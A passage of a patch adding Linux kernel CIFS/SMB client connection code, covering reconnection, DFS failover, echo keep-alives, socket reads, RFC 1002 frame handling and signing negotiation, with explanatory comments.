++		 __func__, ttl);
++	mod_delayed_work(cifsiod_wq, &server->resolve, (ttl * HZ));
++
++	return rc;
++}
++
++static void smb2_query_server_interfaces(struct work_struct *work)
++{
++	int rc;
++	struct cifs_tcon *tcon = container_of(work,
++					struct cifs_tcon,
++					query_interfaces.work);
++
++	/*
++	 * query server network interfaces, in case they change
++	 */
++	rc = SMB3_request_interfaces(0, tcon, false);
++	if (rc) {
++		cifs_dbg(FYI, "%s: failed to query server interfaces: %d\n",
++				__func__, rc);
++	}
++
++	queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
++			   (SMB_INTERFACE_POLL_INTERVAL * HZ));
++}
++
++static void cifs_resolve_server(struct work_struct *work)
++{
++	int rc;
++	struct TCP_Server_Info *server = container_of(work,
++					struct TCP_Server_Info, resolve.work);
++
++	cifs_server_lock(server);
++
++	/*
++	 * Resolve the hostname again to make sure that IP address is up-to-date.
++	 */
++	rc = reconn_set_ipaddr_from_hostname(server);
++	if (rc) {
++		cifs_dbg(FYI, "%s: failed to resolve hostname: %d\n",
++				__func__, rc);
++	}
++
++	cifs_server_unlock(server);
++}
++
++/*
++ * Update the tcpStatus for the server.
++ * This is used to signal the cifsd thread to call cifs_reconnect.
++ * ONLY the cifsd thread should call cifs_reconnect; any other
++ * thread must use this function instead.
++ *
++ * @server: the tcp ses for which reconnect is needed
++ * @all_channels: if this needs to be done for all channels
++ */
++void
++cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
++				bool all_channels)
++{
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses;
++	int i;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	spin_lock(&pserver->srv_lock);
++	if (!all_channels) {
++		pserver->tcpStatus = CifsNeedReconnect;
++		spin_unlock(&pserver->srv_lock);
++		return;
++	}
++	spin_unlock(&pserver->srv_lock);
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
++		spin_lock(&ses->chan_lock);
++		for (i = 0; i < ses->chan_count; i++) {
++			spin_lock(&ses->chans[i].server->srv_lock);
++			ses->chans[i].server->tcpStatus = CifsNeedReconnect;
++			spin_unlock(&ses->chans[i].server->srv_lock);
++		}
++		spin_unlock(&ses->chan_lock);
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++}
++
++/*
++ * Mark all sessions and tcons for reconnect.
++ * IMPORTANT: make sure that this gets called only from
++ * cifsd thread. For any other thread, use
++ * cifs_signal_cifsd_for_reconnect
++ *
++ * @server: the tcp ses for which reconnect is needed; it must already
++ *	have been set to CifsNeedReconnect.
++ * @mark_smb_session: whether even sessions need to be marked
++ */
++void
++cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
++				      bool mark_smb_session)
++{
++	struct TCP_Server_Info *pserver;
++	struct cifs_ses *ses, *nses;
++	struct cifs_tcon *tcon;
++
++	/*
++	 * before reconnecting the tcp session, mark the smb session (uid) and the tid bad so they
++	 * are not used until reconnected.
++	 */
++	cifs_dbg(FYI, "%s: marking necessary sessions and tcons for reconnect\n", __func__);
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry_safe(ses, nses, &pserver->smb_ses_list, smb_ses_list) {
++		/* check if iface is still active */
++		if (!cifs_chan_is_iface_active(ses, server))
++			cifs_chan_update_iface(ses, server);
++
++		spin_lock(&ses->chan_lock);
++		if (!mark_smb_session && cifs_chan_needs_reconnect(ses, server)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
++
++		if (mark_smb_session)
++			CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses);
++		else
++			cifs_chan_set_need_reconnect(ses, server);
++
++		cifs_dbg(FYI, "%s: channel connect bitmap: 0x%lx\n",
++			 __func__, ses->chans_need_reconnect);
++
++		/* If all channels need reconnect, then tcon needs reconnect */
++		if (!mark_smb_session && !CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
++			spin_unlock(&ses->chan_lock);
++			continue;
++		}
++		spin_unlock(&ses->chan_lock);
++
++		spin_lock(&ses->ses_lock);
++		ses->ses_status = SES_NEED_RECON;
++		spin_unlock(&ses->ses_lock);
++
++		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++			tcon->need_reconnect = true;
++			spin_lock(&tcon->tc_lock);
++			tcon->status = TID_NEED_RECON;
++			spin_unlock(&tcon->tc_lock);
++		}
++		if (ses->tcon_ipc) {
++			ses->tcon_ipc->need_reconnect = true;
++			spin_lock(&ses->tcon_ipc->tc_lock);
++			ses->tcon_ipc->status = TID_NEED_RECON;
++			spin_unlock(&ses->tcon_ipc->tc_lock);
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++}
++
++static void
++cifs_abort_connection(struct TCP_Server_Info *server)
++{
++	struct mid_q_entry *mid, *nmid;
++	struct list_head retry_list;
++
++	server->maxBuf = 0;
++	server->max_read = 0;
++
++	/* do not want to be sending data on a socket we are freeing */
++	cifs_dbg(FYI, "%s: tearing down socket\n", __func__);
++	cifs_server_lock(server);
++	if (server->ssocket) {
++		cifs_dbg(FYI, "State: 0x%x Flags: 0x%lx\n", server->ssocket->state,
++			 server->ssocket->flags);
++		kernel_sock_shutdown(server->ssocket, SHUT_WR);
++		cifs_dbg(FYI, "Post shutdown state: 0x%x Flags: 0x%lx\n", server->ssocket->state,
++			 server->ssocket->flags);
++		sock_release(server->ssocket);
++		server->ssocket = NULL;
++	}
++	server->sequence_number = 0;
++	server->session_estab = false;
++	kfree_sensitive(server->session_key.response);
++	server->session_key.response = NULL;
++	server->session_key.len = 0;
++	server->lstrp = jiffies;
++
++	/* mark submitted MIDs for retry and issue callback */
++	INIT_LIST_HEAD(&retry_list);
++	cifs_dbg(FYI, "%s: moving mids to private list\n", __func__);
++	spin_lock(&server->mid_lock);
++	list_for_each_entry_safe(mid, nmid, &server->pending_mid_q, qhead) {
++		kref_get(&mid->refcount);
++		if (mid->mid_state == MID_REQUEST_SUBMITTED)
++			mid->mid_state = MID_RETRY_NEEDED;
++		list_move(&mid->qhead, &retry_list);
++		mid->mid_flags |= MID_DELETED;
++	}
++	spin_unlock(&server->mid_lock);
++	cifs_server_unlock(server);
++
++	cifs_dbg(FYI, "%s: issuing mid callbacks\n", __func__);
++	list_for_each_entry_safe(mid, nmid, &retry_list, qhead) {
++		list_del_init(&mid->qhead);
++		mid->callback(mid);
++		release_mid(mid);
++	}
++
++	if (cifs_rdma_enabled(server)) {
++		cifs_server_lock(server);
++		smbd_destroy(server);
++		cifs_server_unlock(server);
++	}
++}
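++
++/*
++ * Note the ordering above: the socket is torn down and the session
++ * state reset under cifs_server_lock(), in-flight mids are moved to a
++ * private list under mid_lock and marked MID_RETRY_NEEDED, and only
++ * once both locks are dropped are the mid callbacks run, since a
++ * callback may block or take its own locks.
++ */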
++
++static bool cifs_tcp_ses_needs_reconnect(struct TCP_Server_Info *server, int num_targets)
++{
++	spin_lock(&server->srv_lock);
++	server->nr_targets = num_targets;
++	if (server->tcpStatus == CifsExiting) {
++		/* the demux thread will exit normally next time through the loop */
++		spin_unlock(&server->srv_lock);
++		wake_up(&server->response_q);
++		return false;
++	}
++
++	cifs_dbg(FYI, "Mark tcp session as need reconnect\n");
++	trace_smb3_reconnect(server->CurrentMid, server->conn_id,
++			     server->hostname);
++	server->tcpStatus = CifsNeedReconnect;
++
++	spin_unlock(&server->srv_lock);
++	return true;
++}
++
++/*
++ * cifs tcp session reconnection
++ *
++ * mark tcp session as reconnecting so it is temporarily locked
++ * mark all smb sessions as reconnecting for the tcp session
++ * reconnect the tcp session
++ * wake up waiters on reconnection (not currently needed)
++ *
++ * if mark_smb_session is passed as true, unconditionally mark
++ * the smb session (and tcon) for reconnect as well. This value
++ * doesn't really matter for the non-multichannel scenario.
++ */
++static int __cifs_reconnect(struct TCP_Server_Info *server,
++			    bool mark_smb_session)
++{
++	int rc = 0;
++
++	if (!cifs_tcp_ses_needs_reconnect(server, 1))
++		return 0;
++
++	cifs_mark_tcp_ses_conns_for_reconnect(server, mark_smb_session);
++
++	cifs_abort_connection(server);
++
++	do {
++		try_to_freeze();
++		cifs_server_lock(server);
++
++		if (!cifs_swn_set_server_dstaddr(server)) {
++			/* resolve the hostname again to make sure that IP address is up-to-date */
++			rc = reconn_set_ipaddr_from_hostname(server);
++			cifs_dbg(FYI, "%s: reconn_set_ipaddr_from_hostname: rc=%d\n", __func__, rc);
++		}
++
++		if (cifs_rdma_enabled(server))
++			rc = smbd_reconnect(server);
++		else
++			rc = generic_ip_connect(server);
++		if (rc) {
++			cifs_server_unlock(server);
++			cifs_dbg(FYI, "%s: reconnect error %d\n", __func__, rc);
++			msleep(3000);
++		} else {
++			atomic_inc(&tcpSesReconnectCount);
++			set_credits(server, 1);
++			spin_lock(&server->srv_lock);
++			if (server->tcpStatus != CifsExiting)
++				server->tcpStatus = CifsNeedNegotiate;
++			spin_unlock(&server->srv_lock);
++			cifs_swn_reset_server_dstaddr(server);
++			cifs_server_unlock(server);
++			mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
++		}
++	} while (server->tcpStatus == CifsNeedReconnect);
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedNegotiate)
++		mod_delayed_work(cifsiod_wq, &server->echo, 0);
++	spin_unlock(&server->srv_lock);
++
++	wake_up(&server->response_q);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++static int __reconnect_target_unlocked(struct TCP_Server_Info *server, const char *target)
++{
++	int rc;
++	char *hostname;
++
++	if (!cifs_swn_set_server_dstaddr(server)) {
++		if (server->hostname != target) {
++			hostname = extract_hostname(target);
++			if (!IS_ERR(hostname)) {
++				spin_lock(&server->srv_lock);
++				kfree(server->hostname);
++				server->hostname = hostname;
++				spin_unlock(&server->srv_lock);
++			} else {
++				cifs_dbg(FYI, "%s: couldn't extract hostname or address from dfs target: %ld\n",
++					 __func__, PTR_ERR(hostname));
++				cifs_dbg(FYI, "%s: default to last target server: %s\n", __func__,
++					 server->hostname);
++			}
++		}
++		/* resolve the hostname again to make sure that IP address is up-to-date. */
++		rc = reconn_set_ipaddr_from_hostname(server);
++		cifs_dbg(FYI, "%s: reconn_set_ipaddr_from_hostname: rc=%d\n", __func__, rc);
++	}
++	/* Reconnect the socket */
++	if (cifs_rdma_enabled(server))
++		rc = smbd_reconnect(server);
++	else
++		rc = generic_ip_connect(server);
++
++	return rc;
++}
++
++static int reconnect_target_unlocked(struct TCP_Server_Info *server, struct dfs_cache_tgt_list *tl,
++				     struct dfs_cache_tgt_iterator **target_hint)
++{
++	int rc;
++	struct dfs_cache_tgt_iterator *tit;
++
++	*target_hint = NULL;
++
++	/* If dfs target list is empty, then reconnect to last server */
++	tit = dfs_cache_get_tgt_iterator(tl);
++	if (!tit)
++		return __reconnect_target_unlocked(server, server->hostname);
++
++	/* Otherwise, try every dfs target in @tl */
++	for (; tit; tit = dfs_cache_get_next_tgt(tl, tit)) {
++		rc = __reconnect_target_unlocked(server, dfs_cache_get_tgt_name(tit));
++		if (!rc) {
++			*target_hint = tit;
++			break;
++		}
++	}
++	return rc;
++}
++
++static int reconnect_dfs_server(struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	const char *refpath = server->current_fullpath + 1;
++	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
++	struct dfs_cache_tgt_iterator *target_hint = NULL;
++	int num_targets = 0;
++
++	/*
++	 * Determine the number of dfs targets the referral path in @cifs_sb resolves to.
++	 *
++	 * smb2_reconnect() needs to know how long it should wait based upon the number of dfs
++	 * targets (server->nr_targets).  It's also possible that the cached referral was cleared
++	 * through /proc/fs/cifs/dfscache or the target list is empty due to server settings after
++	 * refreshing the referral, so, in this case, default it to 1.
++	 */
++	if (!dfs_cache_noreq_find(refpath, NULL, &tl))
++		num_targets = dfs_cache_get_nr_tgts(&tl);
++	if (!num_targets)
++		num_targets = 1;
++
++	if (!cifs_tcp_ses_needs_reconnect(server, num_targets))
++		return 0;
++
++	/*
++	 * Unconditionally mark all sessions & tcons for reconnect as we might be connecting to a
++	 * different server or share during failover.  It could be improved by adding some logic to
++	 * only do that in case it connects to a different server or share, though.
++	 */
++	cifs_mark_tcp_ses_conns_for_reconnect(server, true);
++
++	cifs_abort_connection(server);
++
++	do {
++		try_to_freeze();
++		cifs_server_lock(server);
++
++		rc = reconnect_target_unlocked(server, &tl, &target_hint);
++		if (rc) {
++			/* Failed to reconnect socket */
++			cifs_server_unlock(server);
++			cifs_dbg(FYI, "%s: reconnect error %d\n", __func__, rc);
++			msleep(3000);
++			continue;
++		}
++		/*
++		 * Socket was created.  Update tcp session status to CifsNeedNegotiate so that a
++		 * process waiting for reconnect will know it needs to re-establish session and tcon
++		 * through the reconnected target server.
++		 */
++		atomic_inc(&tcpSesReconnectCount);
++		set_credits(server, 1);
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsExiting)
++			server->tcpStatus = CifsNeedNegotiate;
++		spin_unlock(&server->srv_lock);
++		cifs_swn_reset_server_dstaddr(server);
++		cifs_server_unlock(server);
++		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
++	} while (server->tcpStatus == CifsNeedReconnect);
++
++	if (target_hint)
++		dfs_cache_noreq_update_tgthint(refpath, target_hint);
++
++	dfs_cache_free_tgts(&tl);
++
++	/* Need to set up echo worker again once connection has been established */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedNegotiate)
++		mod_delayed_work(cifsiod_wq, &server->echo, 0);
++	spin_unlock(&server->srv_lock);
++
++	wake_up(&server->response_q);
++	return rc;
++}
++
++int cifs_reconnect(struct TCP_Server_Info *server, bool mark_smb_session)
++{
++	/* If the tcp session is not a dfs connection, then reconnect to the last target server */
++	spin_lock(&server->srv_lock);
++	if (!server->is_dfs_conn) {
++		spin_unlock(&server->srv_lock);
++		return __cifs_reconnect(server, mark_smb_session);
++	}
++	spin_unlock(&server->srv_lock);
++
++	mutex_lock(&server->refpath_lock);
++	if (!server->origin_fullpath || !server->leaf_fullpath) {
++		mutex_unlock(&server->refpath_lock);
++		return __cifs_reconnect(server, mark_smb_session);
++	}
++	mutex_unlock(&server->refpath_lock);
++
++	return reconnect_dfs_server(server);
++}
++#else
++int cifs_reconnect(struct TCP_Server_Info *server, bool mark_smb_session)
++{
++	return __cifs_reconnect(server, mark_smb_session);
++}
++#endif
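++
++/*
++ * Typical call patterns for this wrapper, as used elsewhere in this
++ * file:
++ *
++ *	cifs_reconnect(server, false);	// transport hiccup: sessions and
++ *					// tcons survive unless every
++ *					// channel is down
++ *	cifs_reconnect(server, true);	// bad or oversized frame: redo
++ *					// sessions and tcons as well
++ */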
++
++static void
++cifs_echo_request(struct work_struct *work)
++{
++	int rc;
++	struct TCP_Server_Info *server = container_of(work,
++					struct TCP_Server_Info, echo.work);
++
++	/*
++	 * We cannot send an echo if it is disabled.
++	 * Also, no need to ping if we got a response recently.
++	 */
++
++	if (server->tcpStatus == CifsNeedReconnect ||
++	    server->tcpStatus == CifsExiting ||
++	    server->tcpStatus == CifsNew ||
++	    (server->ops->can_echo && !server->ops->can_echo(server)) ||
++	    time_before(jiffies, server->lstrp + server->echo_interval - HZ))
++		goto requeue_echo;
++
++	rc = server->ops->echo ? server->ops->echo(server) : -ENOSYS;
++	cifs_server_dbg(FYI, "send echo request: rc = %d\n", rc);
++
++	/* Check witness registrations */
++	cifs_swn_check();
++
++requeue_echo:
++	queue_delayed_work(cifsiod_wq, &server->echo, server->echo_interval);
++}
++
++static bool
++allocate_buffers(struct TCP_Server_Info *server)
++{
++	if (!server->bigbuf) {
++		server->bigbuf = (char *)cifs_buf_get();
++		if (!server->bigbuf) {
++			cifs_server_dbg(VFS, "No memory for large SMB response\n");
++			msleep(3000);
++			/* retry will check if exiting */
++			return false;
++		}
++	} else if (server->large_buf) {
++		/* we are reusing a dirty large buf, clear its start */
++		memset(server->bigbuf, 0, HEADER_SIZE(server));
++	}
++
++	if (!server->smallbuf) {
++		server->smallbuf = (char *)cifs_small_buf_get();
++		if (!server->smallbuf) {
++			cifs_server_dbg(VFS, "No memory for SMB response\n");
++			msleep(1000);
++			/* retry will check if exiting */
++			return false;
++		}
++		/* beginning of smb buffer is cleared in our buf_get */
++	} else {
++		/* if existing small buf clear beginning */
++		memset(server->smallbuf, 0, HEADER_SIZE(server));
++	}
++
++	return true;
++}
++
++static bool
++server_unresponsive(struct TCP_Server_Info *server)
++{
++	/*
++	 * We need to wait 3 echo intervals to make sure we handle such
++	 * situations right:
++	 * 1s  client sends a normal SMB request
++	 * 2s  client gets a response
++	 * 30s echo workqueue job pops, and decides we got a response recently
++	 *     and don't need to send another
++	 * ...
++	 * 65s kernel_recvmsg times out, and we see that we haven't gotten
++	 *     a response in >60s.
++	 */
++	spin_lock(&server->srv_lock);
++	if ((server->tcpStatus == CifsGood ||
++	    server->tcpStatus == CifsNeedNegotiate) &&
++	    (!server->ops->can_echo || server->ops->can_echo(server)) &&
++	    time_after(jiffies, server->lstrp + 3 * server->echo_interval)) {
++		spin_unlock(&server->srv_lock);
++		cifs_server_dbg(VFS, "has not responded in %lu seconds. Reconnecting...\n",
++			 (3 * server->echo_interval) / HZ);
++		cifs_reconnect(server, false);
++		return true;
++	}
++	spin_unlock(&server->srv_lock);
++
++	return false;
++}
++
++static inline bool
++zero_credits(struct TCP_Server_Info *server)
++{
++	int val;
++
++	spin_lock(&server->req_lock);
++	val = server->credits + server->echo_credits + server->oplock_credits;
++	if (server->in_flight == 0 && val == 0) {
++		spin_unlock(&server->req_lock);
++		return true;
++	}
++	spin_unlock(&server->req_lock);
++	return false;
++}
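++
++/*
++ * Rationale: if credits, echo_credits and oplock_credits are all zero
++ * while nothing is in flight, no response can ever arrive to
++ * replenish credits, so the connection is wedged and reconnecting is
++ * the only way forward.
++ */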
++
++static int
++cifs_readv_from_socket(struct TCP_Server_Info *server, struct msghdr *smb_msg)
++{
++	int length = 0;
++	int total_read;
++
++	for (total_read = 0; msg_data_left(smb_msg); total_read += length) {
++		try_to_freeze();
++
++		/* reconnect if no credits and no requests in flight */
++		if (zero_credits(server)) {
++			cifs_reconnect(server, false);
++			return -ECONNABORTED;
++		}
++
++		if (server_unresponsive(server))
++			return -ECONNABORTED;
++		if (cifs_rdma_enabled(server) && server->smbd_conn)
++			length = smbd_recv(server->smbd_conn, smb_msg);
++		else
++			length = sock_recvmsg(server->ssocket, smb_msg, 0);
++
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus == CifsExiting) {
++			spin_unlock(&server->srv_lock);
++			return -ESHUTDOWN;
++		}
++
++		if (server->tcpStatus == CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			cifs_reconnect(server, false);
++			return -ECONNABORTED;
++		}
++		spin_unlock(&server->srv_lock);
++
++		if (length == -ERESTARTSYS ||
++		    length == -EAGAIN ||
++		    length == -EINTR) {
++			/*
++			 * Minimum sleep to prevent looping, allowing socket
++			 * to clear and app threads to set tcpStatus
++			 * CifsNeedReconnect if server hung.
++			 */
++			usleep_range(1000, 2000);
++			length = 0;
++			continue;
++		}
++
++		if (length <= 0) {
++			cifs_dbg(FYI, "Received no data or error: %d\n", length);
++			cifs_reconnect(server, false);
++			return -ECONNABORTED;
++		}
++	}
++	return total_read;
++}
++
++int
++cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
++		      unsigned int to_read)
++{
++	struct msghdr smb_msg = {};
++	struct kvec iov = {.iov_base = buf, .iov_len = to_read};
++	iov_iter_kvec(&smb_msg.msg_iter, ITER_DEST, &iov, 1, to_read);
++
++	return cifs_readv_from_socket(server, &smb_msg);
++}
++
++ssize_t
++cifs_discard_from_socket(struct TCP_Server_Info *server, size_t to_read)
++{
++	struct msghdr smb_msg = {};
++
++	/*
++	 * iov_iter_discard already sets smb_msg.msg_iter (type, count and
++	 * iov_offset), and cifs_readv_from_socket sets msg_control and
++	 * msg_controllen, so there is little left to initialize in the
++	 * struct msghdr.
++	 */
++	iov_iter_discard(&smb_msg.msg_iter, ITER_DEST, to_read);
++
++	return cifs_readv_from_socket(server, &smb_msg);
++}
++
++int
++cifs_read_page_from_socket(struct TCP_Server_Info *server, struct page *page,
++	unsigned int page_offset, unsigned int to_read)
++{
++	struct msghdr smb_msg = {};
++	struct bio_vec bv = {
++		.bv_page = page, .bv_len = to_read, .bv_offset = page_offset};
++	iov_iter_bvec(&smb_msg.msg_iter, ITER_DEST, &bv, 1, to_read);
++	return cifs_readv_from_socket(server, &smb_msg);
++}
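++
++/*
++ * The three read helpers above differ only in the iov_iter flavour
++ * they wrap (ITER_KVEC, a discard iterator, ITER_BVEC); all of them
++ * funnel into cifs_readv_from_socket(). A typical caller first pulls
++ * in the 4-byte RFC1001 header, e.g.:
++ *
++ *	length = cifs_read_from_socket(server, buf, 4);
++ */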
++
++static bool
++is_smb_response(struct TCP_Server_Info *server, unsigned char type)
++{
++	/*
++	 * The first byte of the (big endian) length field is
++	 * actually not part of the length but the frame type,
++	 * with the most common value, zero, denoting a regular
++	 * session message.
++	 */
++	switch (type) {
++	case RFC1002_SESSION_MESSAGE:
++		/* Regular SMB response */
++		return true;
++	case RFC1002_SESSION_KEEP_ALIVE:
++		cifs_dbg(FYI, "RFC 1002 session keep alive\n");
++		break;
++	case RFC1002_POSITIVE_SESSION_RESPONSE:
++		cifs_dbg(FYI, "RFC 1002 positive session response\n");
++		break;
++	case RFC1002_NEGATIVE_SESSION_RESPONSE:
++		/*
++		 * We get this from Windows 98 instead of an error on
++		 * SMB negprot response.
++		 */
++		cifs_dbg(FYI, "RFC 1002 negative session response\n");
++		/* give server a second to clean up */
++		msleep(1000);
++		/*
++		 * Always try 445 first on reconnect since we get a NACK
++		 * from some servers if we ever connected to port 139 (the
++		 * NACK comes because we do not begin with an RFC1001
++		 * session initialize frame).
++		 */
++		cifs_set_port((struct sockaddr *)&server->dstaddr, CIFS_PORT);
++		cifs_reconnect(server, true);
++		break;
++	default:
++		cifs_server_dbg(VFS, "RFC 1002 unknown response type 0x%x\n", type);
++		cifs_reconnect(server, true);
++	}
++
++	return false;
++}
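++
++/*
++ * On the wire (RFC 1002 session service) a regular SMB response
++ * starts with 0x00 followed by a 3-byte length, while a keep-alive is
++ * the four bytes 0x85 0x00 0x00 0x00; only the former makes this
++ * function return true and proceed to parsing.
++ */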
++
++void
++dequeue_mid(struct mid_q_entry *mid, bool malformed)
++{
++#ifdef CONFIG_CIFS_STATS2
++	mid->when_received = jiffies;
++#endif
++	spin_lock(&mid->server->mid_lock);
++	if (!malformed)
++		mid->mid_state = MID_RESPONSE_RECEIVED;
++	else
++		mid->mid_state = MID_RESPONSE_MALFORMED;
++	/*
++	 * Trying to handle/dequeue a mid after the send_recv()
++	 * function has finished processing it is a bug.
++	 */
++	if (mid->mid_flags & MID_DELETED) {
++		spin_unlock(&mid->server->mid_lock);
++		pr_warn_once("trying to dequeue a deleted mid\n");
++	} else {
++		list_del_init(&mid->qhead);
++		mid->mid_flags |= MID_DELETED;
++		spin_unlock(&mid->server->mid_lock);
++	}
++}
++
++static unsigned int
++smb2_get_credits_from_hdr(char *buffer, struct TCP_Server_Info *server)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buffer;
++
++	/*
++	 * SMB1 does not use credits.
++	 */
++	if (is_smb1(server))
++		return 0;
++
++	return le16_to_cpu(shdr->CreditRequest);
++}
++
++static void
++handle_mid(struct mid_q_entry *mid, struct TCP_Server_Info *server,
++	   char *buf, int malformed)
++{
++	if (server->ops->check_trans2 &&
++	    server->ops->check_trans2(mid, server, buf, malformed))
++		return;
++	mid->credits_received = smb2_get_credits_from_hdr(buf, server);
++	mid->resp_buf = buf;
++	mid->large_buf = server->large_buf;
++	/* Was previous buf put in mpx struct for multi-rsp? */
++	if (!mid->multiRsp) {
++		/* smb buffer will be freed by user thread */
++		if (server->large_buf)
++			server->bigbuf = NULL;
++		else
++			server->smallbuf = NULL;
++	}
++	dequeue_mid(mid, malformed);
++}
++
++int
++cifs_enable_signing(struct TCP_Server_Info *server, bool mnt_sign_required)
++{
++	bool srv_sign_required = server->sec_mode & server->vals->signing_required;
++	bool srv_sign_enabled = server->sec_mode & server->vals->signing_enabled;
++	bool mnt_sign_enabled;
++
++	/*
++	 * Is signing required by mnt options? If not then check
++	 * global_secflags to see if signing is required there.
++	 */
++	if (!mnt_sign_required)
++		mnt_sign_required = ((global_secflags & CIFSSEC_MUST_SIGN) ==
++						CIFSSEC_MUST_SIGN);
++
++	/*
++	 * If signing is required then it's automatically enabled too,
++	 * otherwise, check to see if the secflags allow it.
++	 */
++	mnt_sign_enabled = mnt_sign_required ? mnt_sign_required :
++				(global_secflags & CIFSSEC_MAY_SIGN);
++
++	/* If server requires signing, does client allow it? */
++	if (srv_sign_required) {
++		if (!mnt_sign_enabled) {
++			cifs_dbg(VFS, "Server requires signing, but it's disabled in SecurityFlags!\n");
++			return -EOPNOTSUPP;
++		}
++		server->sign = true;
++	}
++
++	/* If client requires signing, does server allow it? */
++	if (mnt_sign_required) {
++		if (!srv_sign_enabled) {
++			cifs_dbg(VFS, "Server does not support signing!\n");
++			return -EOPNOTSUPP;
++		}
++		server->sign = true;
++	}
++
++	if (cifs_rdma_enabled(server) && server->sign)
++		cifs_dbg(VFS, "Signing is enabled, and RDMA read/write will be disabled\n");
++
++	return 0;
++}
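++
++/*
++ * Net effect of the checks above, in brief:
++ *
++ *	server requires, client allows    -> server->sign = true
++ *	server requires, client forbids   -> -EOPNOTSUPP
++ *	client requires, server enables   -> server->sign = true
++ *	client requires, server disables  -> -EOPNOTSUPP
++ *	neither side requires signing     -> server->sign left as is
++ */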
++
++static void clean_demultiplex_info(struct TCP_Server_Info *server)
++{
++	int length;
++
++	/* take it off the list, if it's not already */
++	spin_lock(&server->srv_lock);
++	list_del_init(&server->tcp_ses_list);
++	spin_unlock(&server->srv_lock);
++
++	cancel_delayed_work_sync(&server->echo);
++	cancel_delayed_work_sync(&server->resolve);
++
++	spin_lock(&server->srv_lock);
++	server->tcpStatus = CifsExiting;
++	spin_unlock(&server->srv_lock);
++	wake_up_all(&server->response_q);
++
++	/* check if we have blocked requests that need to free */
++	spin_lock(&server->req_lock);
++	if (server->credits <= 0)
++		server->credits = 1;
++	spin_unlock(&server->req_lock);
++	/*
++	 * Although there should not be any requests blocked on this queue, it
++	 * cannot hurt to be paranoid and try to wake up any that may have been
++	 * blocked when more than 50 at a time were on the wire to the same
++	 * server - they will now see the session is in the exit state and get
++	 * out of SendReceive.
++	 */
++	wake_up_all(&server->request_q);
++	/* give those requests time to exit */
++	msleep(125);
++	if (cifs_rdma_enabled(server))
++		smbd_destroy(server);
++	if (server->ssocket) {
++		sock_release(server->ssocket);
++		server->ssocket = NULL;
++	}
++
++	if (!list_empty(&server->pending_mid_q)) {
++		struct list_head dispose_list;
++		struct mid_q_entry *mid_entry;
++		struct list_head *tmp, *tmp2;
++
++		INIT_LIST_HEAD(&dispose_list);
++		spin_lock(&server->mid_lock);
++		list_for_each_safe(tmp, tmp2, &server->pending_mid_q) {
++			mid_entry = list_entry(tmp, struct mid_q_entry, qhead);
++			cifs_dbg(FYI, "Clearing mid %llu\n", mid_entry->mid);
++			kref_get(&mid_entry->refcount);
++			mid_entry->mid_state = MID_SHUTDOWN;
++			list_move(&mid_entry->qhead, &dispose_list);
++			mid_entry->mid_flags |= MID_DELETED;
++		}
++		spin_unlock(&server->mid_lock);
++
++		/* now walk dispose list and issue callbacks */
++		list_for_each_safe(tmp, tmp2, &dispose_list) {
++			mid_entry = list_entry(tmp, struct mid_q_entry, qhead);
++			cifs_dbg(FYI, "Callback mid %llu\n", mid_entry->mid);
++			list_del_init(&mid_entry->qhead);
++			mid_entry->callback(mid_entry);
++			release_mid(mid_entry);
++		}
++		/* 1/8th of sec is more than enough time for them to exit */
++		msleep(125);
++	}
++
++	if (!list_empty(&server->pending_mid_q)) {
++		/*
++		 * mpx threads have not exited yet, so give them at least the
++		 * smb send timeout for long ops.
++		 *
++		 * Due to delays on oplock break requests, we need to wait at
++		 * least 45 seconds before giving up on a request getting a
++		 * response and going ahead and killing cifsd.
++		 */
++		cifs_dbg(FYI, "Wait for exit from demultiplex thread\n");
++		msleep(46000);
++		/*
++		 * If the threads still have not exited, they are probably
++		 * never coming home; not much else we can do but free the
++		 * memory.
++		 */
++	}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	kfree(server->origin_fullpath);
++	kfree(server->leaf_fullpath);
++#endif
++	kfree(server);
++
++	length = atomic_dec_return(&tcpSesAllocCount);
++	if (length > 0)
++		mempool_resize(cifs_req_poolp, length + cifs_min_rcv);
++}
++
++static int
++standard_receive3(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	int length;
++	char *buf = server->smallbuf;
++	unsigned int pdu_length = server->pdu_size;
++
++	/* make sure this will fit in a large buffer */
++	if (pdu_length > CIFSMaxBufSize + MAX_HEADER_SIZE(server) -
++	    HEADER_PREAMBLE_SIZE(server)) {
++		cifs_server_dbg(VFS, "SMB response too long (%u bytes)\n", pdu_length);
++		cifs_reconnect(server, true);
++		return -ECONNABORTED;
++	}
++
++	/* switch to large buffer if too big for a small one */
++	if (pdu_length > MAX_CIFS_SMALL_BUFFER_SIZE - 4) {
++		server->large_buf = true;
++		memcpy(server->bigbuf, buf, server->total_read);
++		buf = server->bigbuf;
++	}
++
++	/* now read the rest */
++	length = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1,
++				       pdu_length - MID_HEADER_SIZE(server));
++
++	if (length < 0)
